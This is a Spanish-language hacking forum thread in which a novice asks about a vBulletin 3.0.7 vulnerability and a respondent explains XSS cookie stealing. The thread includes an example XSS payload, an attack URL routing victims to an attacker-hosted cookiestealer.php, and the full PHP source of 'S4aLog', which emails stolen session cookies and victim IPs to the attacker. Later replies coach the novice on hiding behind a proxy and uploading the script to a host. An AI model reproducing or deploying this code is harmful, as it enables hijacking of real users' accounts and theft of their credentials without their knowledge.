http://www.fr33d0m.net/content-1560.html que tan cierto es esta vulnerabilidad para vbulletin 3.0.7 y que hace para que sirve??? disculpen la curiosidad pero soy novato xDDD
Bueno el Cookies stealer es una tecnica q se utiliza para robar las cookies al estilo XSS. Es decir una victima abre la pagina maliciosa y tendras la identidad; es decir su user, pass y IP. Esta es de las tecnicas mas faciles de encontar pero la mas q lleva tiempo lo q caen en la trampa. Sobre como funciona pues sencillo tenemos una pagina "www.victima.com" en la q descubrimos q tiene un agujero (www.victima.com?id="BUG"), este bug es multi-explotable es decir q puedes utilizar otros metodos como el RFI. Cual es la diferencia del XSS y Cookie Stealer? Muy sencillo, en el XSS se utilizan script echos en java para formal la trampa (seria algo como "www.victima.com?id="><script>alert('el bug XSS');</script>"); al contrario del Cookie Stealer se utiliza un script PHP, es decir otra pagina (algo como "www.victima.com?id=http://www.mipagina.com/cookiestealer.php?formato=robarcookie"). Porq se utilizan dos pagina???? Sencillo, la victima sera la pagina donde se robaran las cookie, la otra sera la q robara y recivira la cookie. Ya basta de tanta baba y vamos al grano ;D
Requisitos::
1) Dominio Hosting para subir el codigo (Puede ser cualquiera con soporte PHP)
2) El codigo Cookie Stealer
3) Pasiencia...
El codigo::
<?php/* S4aLog v1.0 [ Beta ]-----------------------**Beta Of S4aLog v1.0 With Str_Repalce <;>! You Can Get Cookies And Refresh The Broweser ! v0.10[ New New New ]!Named Your Attack With $nm e.x http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies [ MSG ]Name : Attack1Cookies : CookiesRefresh : http://www.s4a.xx [ MSG ]!!Get Cookies Like This :: bbpassword[000000] bbhash[0000] || Old bbpassword=12121; bbhash=12121;![ New New New ]*/$YourMail = "[email protected]"; // Your E-mail/*-----------------------*/$Ip = $REMOTE_ADDR;$Cooki_e = $_GET['id'];$NameOfAttack = $_GET['nm'];$Refresh = $_GET['re'];/* Start */$ReplaceCookie1 = array("=",";");$ReplaceCookie2 = array("[ "," ] ");$Cooki_e = str_replace($ReplaceCookie1,$ReplaceCookie2,$Cooki _e); // Replace/* e.x hash=0210; | hash[0210]*///***************************************//$Hdr = "From: S4aLog <[email protected]>";$Msg ="Mr Attacker ;) ,,, S4aLog v1 Beta <<[ ".$NameOfAttack." ] ,, Name Of Attack[ ".$Refresh." ] ,, Refresh Page[ ".$Ip." ] ,, Ip[ S4aLog < By Devil-00 > -- Thnx For -- <Yes2Hack> <xxx (hacker)> <s4a Members> ][ [email protected] - [email protected] ]-----------------------------------------------Cookie ::".$Cooki_e."";/* ------------------------------------------------------------------------- */$Send = mail($YourMail,"S4aLog -- NewLog",$Msg,$Hdr);/************************************************** ***************************/if($Send){if($Refresh <> ""){header("location:".$Refresh);}}?>
PD: Cualquier duda posteen :P
gracias por responder tengo unas dudas primero se mandaran los cookies a la el servidor php ? en ese caso cambiara el aspecto de la web original? o sera casi como un puente directo?
en donde dice your mail debo poner mi mail xD(asta yo me senti tonto preguntendo eso pero no la quiero regar)
hay alguna manera de que me rasteen despues de?? si es ese el caso sirve de algo que enmascare mi ip?
gracias por contestar saludos
Vamo a ver si te saco de dudas...
1) Primero la pagina q crearas q contiene el codigo PHP malicioso lo q hace es robar la cookie y creara otro archivo donde estaran todas las cookie de persona q calleron (sera creado en el servidor).
2) No cambiara nada, es mas la victima no se dara cuenta de nada al menos q conosca la tecnica.
3) Sera un puente.
4) ^^ Todo lo q este despues de:: "//" o "/* */" son comentarios y deves de hacer lo q te pide o solo te informa.
5) Bueno recuerda q deves de poner la pagina maliciona en la Web victima, puede q se den cuenta como puede q no. Es recomendable siempre entrar con un Proxy ya q estas realizando un ataque...
PD: Sino entendiste dimelo y trato de explicarlo mejor ;)
gracias por ayudarme men tengo una duda muy bruta ....bueno mas que las anteriores xD jejee lo que pasa es que me acabo de registra en un host y tal.......pero no se como subir en php debo poner el codigo como tema o ponerlo como el codigo fuente del php xD disculpa pero si tienes tiempo te mando mi msn y si no pues me contestas en el foro si puedes y gracias por aguantar mis preguntas xD
para subir el codigo php create el archivo en cualquier editor de php xD y lo guardas ........ en el host buscas la opcion de file manager o administrador de archivos ... si no lo encuentras subelo mendiante tu cliente ftp a tu host ftp ;)
http://site/log?re=http://www.s4a.cc/&nm=Attack1&id=Cookies aqui me imagino que la primera sera la pagina victima y la segunda la direccion de la mia o me equivoco? , otra cosa es que no puedo subirla me recomiendan un host porfa camara gracias a todos
ya probaste en lycos ahi creo que maneja el php :-\
no me deja registrarme por eso no lo puedo utilisar lo unico que encontre fue forumup pero no se como poner mi propio codigo